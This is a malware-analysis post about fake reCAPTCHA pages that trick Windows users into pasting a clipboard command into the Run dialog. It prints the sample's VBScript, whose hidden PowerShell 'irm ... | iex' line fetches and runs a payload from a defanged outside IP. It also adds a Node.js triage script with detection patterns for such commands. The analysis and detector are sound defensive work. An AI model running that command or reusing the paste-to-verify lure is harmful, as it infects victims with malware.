Analysis of a Malicious reCAPTCHA

 


Cyber attackers are always looking for new ways to attack. We have analyzed many different scripts, files and techniques in the past. This time we will analyze a newer attacker technique known as Fake-reCAPTCHA.

First, we need to know what a CAPTCHA is. CAPTCHA, which stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart, is a security measure used to distinguish between human users and automated bots. It presents a challenge that is easy for humans to solve but difficult for computers.

Attackers have counterfeited this mechanism. First, they create a fake CAPTCHA page. Then, using some JavaScript code, the page automatically copies malicious PowerShell code to the clipboard and tells you, step by step, how to infect yourself with the malware, as clearly shown in the figure below:



Infection process designed by the malware developer:

The page asks the victim to complete the verification steps shown in the image:

  1. Press & hold Windows Key + R: This opens the Run dialog box in Windows.

  2. Press Ctrl + V in the verification window: This pastes the clipboard contents, presented as a verification string or ID (e.g., "reCAPTCHA Verification ID: 6467"), into the Run dialog or a related prompt. As described above, the page has already copied the malicious command to the clipboard.

  3. Press Enter: This executes the pasted input, which the page presents as completing the verification process.


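Malicious PowerShell Code:

    ' VBScript wrapper: each Run call starts a process through WScript.Shell
    Set objShell = CreateObject("WScript.Shell")
    ' Kill a running process by image name, in a hidden window (style 0)
    objShell.Run "taskkill /IM KjGryNSu.exe", 0
    ' Hidden: download the next stage (irm) and run it in memory (iex); URL is defanged
    objShell.Run "powershell -c irm http[://]185.100.157.217[:85]/opencaptcha[.txt] | iex", 0, False
    ' Visible decoy window (style 1): fake "verification" output shown to the user
    objShell.Run "powershell.exe Write-Output 'Checking you are robot?'; Start-Sleep -Seconds 5; echo 'Verification status: ERROR'; Start-Sleep -Seconds 5", 1, False
    ' Routine not shown on this page; by its name, it empties the clipboard
    ClearClipboard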


In another example, the malware developer encoded the malicious PowerShell code as character codes (charcode).
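
For analysts triaging such a page, here is an added example (not code from the analysed sample or from this post's author): a small Node.js script that decodes comma-separated character-code runs found in a page's source and checks the decoded text for the commands seen in the sample above. The sample page, the `example.invalid` host, and the clipboard API patterns are assumptions constructed for illustration.

```javascript
// Added example: static triage of a suspected fake-CAPTCHA page (no code is executed).
// Indicator names come from the sample on this page; the clipboard APIs are an assumption.
const INDICATORS = {
  powershell: /\bpowershell(\.exe)?\b/i,
  irm: /\b(irm|invoke-restmethod)\b/i,   // PowerShell download cmdlet and its alias
  iex: /\b(iex|invoke-expression)\b/i,   // PowerShell evaluate cmdlet and its alias
  'wscript.shell': /wscript\.shell/i,
};
const CLIPBOARD_WRITE = /navigator\.clipboard\.writeText|execCommand\(\s*['"]copy['"]/;
// A run of 8 or more comma-separated integers, e.g. String.fromCharCode(112,111,...)
const CODE_RUN = /\b(?:\d{1,5}\s*,\s*){7,}\d{1,5}\b/g;

// Turn every char-code run in the source back into text.
function decodeCharCodeRuns(source) {
  return (source.match(CODE_RUN) || []).map(run =>
    run.split(',').map(n => String.fromCharCode(Number(n))).join(''));
}

// Names of the indicators that appear in a piece of text.
function hitsIn(text) {
  return Object.keys(INDICATORS).filter(name => INDICATORS[name].test(text));
}

// Flag a page that both writes to the clipboard and carries a command indicator,
// either in plain text or hidden inside a char-code run.
function triagePage(source) {
  const decoded = decodeCharCodeRuns(source).map(text => ({ text, hits: hitsIn(text) }));
  const plainHits = hitsIn(source);
  const writesClipboard = CLIPBOARD_WRITE.test(source);
  const suspicious = writesClipboard &&
    (plainHits.length > 0 || decoded.some(d => d.hits.length > 0));
  return { writesClipboard, plainHits, decoded, suspicious };
}

// Constructed sample: defanged command with a placeholder host, hidden as char codes.
const CMD = 'powershell -c irm http[://]example.invalid/opencaptcha[.txt] | iex';
const SAMPLE_PAGE = `<script>
  const p = String.fromCharCode(${Array.from(CMD, c => c.charCodeAt(0)).join(',')});
  navigator.clipboard.writeText(p);
</script>`;

console.log(JSON.stringify(triagePage(SAMPLE_PAGE), null, 2));
```

The decoder only reads the page text, so it can be run on saved HTML without loading the page in a browser.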

